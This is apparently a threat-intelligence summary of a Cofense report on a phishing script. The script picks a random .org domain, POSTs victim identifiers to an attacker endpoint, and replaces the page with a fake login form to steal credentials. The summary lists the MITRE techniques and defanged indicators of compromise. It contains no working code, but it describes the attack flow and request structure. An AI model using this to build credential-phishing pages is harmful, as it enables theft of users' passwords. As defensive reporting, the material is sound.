Cofense Intelligence discovered a sophisticated phishing script that selects a random .org domain, generates dual UUIDs, and performs server-driven dynamic page replacement to steal credentials while evading detection. This technique leverages HTML-based attachments and cloud-collaboration spoofing to deliver the malicious payload and targets enterprise users with tailored fake login pages. #Cofense #uuidv4
Keypoints
- The phishing script selects a single random .org domain from a hardcoded list for each execution, avoiding failover and reducing detectable network noise.
- The script includes both a hardcoded campaign UUID (6fafd0343-d771-4987-a760-25e5b31b44f) and a dynamically generated session UUID (uuidv4()) to track campaigns and individual victims.
- Delivery vectors observed include HTML-based email attachments and emails with links spoofing cloud collaboration platforms like Microsoft OneDrive, SharePoint Online, DocuSign, Google Docs, and Adobe Sign.
- The script loads legitimate libraries (e.g., jQuery from cdnjs.cloudflare.com) and checks/decodes Base64-encoded strings and validates email addresses to tailor responses.
- The attack uses an HTTPS POST to hxxps://[chosen-domain]/api/v3/auth with JSON payload containing uuid, identifier, server, and user to request a server-generated credential phishing page.
- Instead of redirecting, the script replaces the current page content with attacker-controlled HTML (dynamic page replacement), enabling seamless credential capture and evasion of URL-based detection.
- This tactic minimizes DNS and network indicators, leverages .org perceived legitimacy, and aligns with targeted spearphishing goals where some delivery failures are acceptable for high-volume campaigns.
MITRE Techniques
- [T1566.002] Phishing: Spearphishing Link – The campaign uses HTML attachments and links that spoof cloud collaboration platforms to deliver malicious URLs, reducing detection through trusted-looking delivery (“phishing email contains HTML-based attachments… embedded URL that automatically leads to a credential phishing page”).
- [T1185] Browser Session Hijacking – The script replaces the current page content with server-provided phishing pages without redirecting, manipulating the browser session (“changing a webpage’s content with attacker-controlled material, like a fake login page, without changing the web address”).
- [T1078] Valid Accounts (credential harvesting) – The attacker collects user credentials via tailored fake login pages generated by the server after receiving identifying information (“serves as a pivotal step … manipulate the user’s browser session … designed to steal passwords or other sensitive information”).
Indicators of Compromise
- [Domain] Random .org domains used as POST endpoints – examples: hxxps://[chosen-domain]/api/v3/auth (selected from a list of nine .org domains).
- [UUID / Identifier] Hardcoded and dynamic UUIDs in POST payload – example hardcoded: 6fafd0343-d771-4987-a760-25e5b31b44f; dynamic: uuidv4() per session.
- [File type / Delivery] HTML-based email attachments and spoofed cloud links – examples: attachments containing embedded URLs, spoofed platforms include Microsoft OneDrive/SharePoint Online and DocuSign.
- [Library Host] Legitimate CDN usage for script loading – example: cdnjs.cloudflare[.]com (used to load jQuery).
Read more: https://cofense.com/blog/unpacking-the-phishing-script-behind-a-server-orchestrated-deception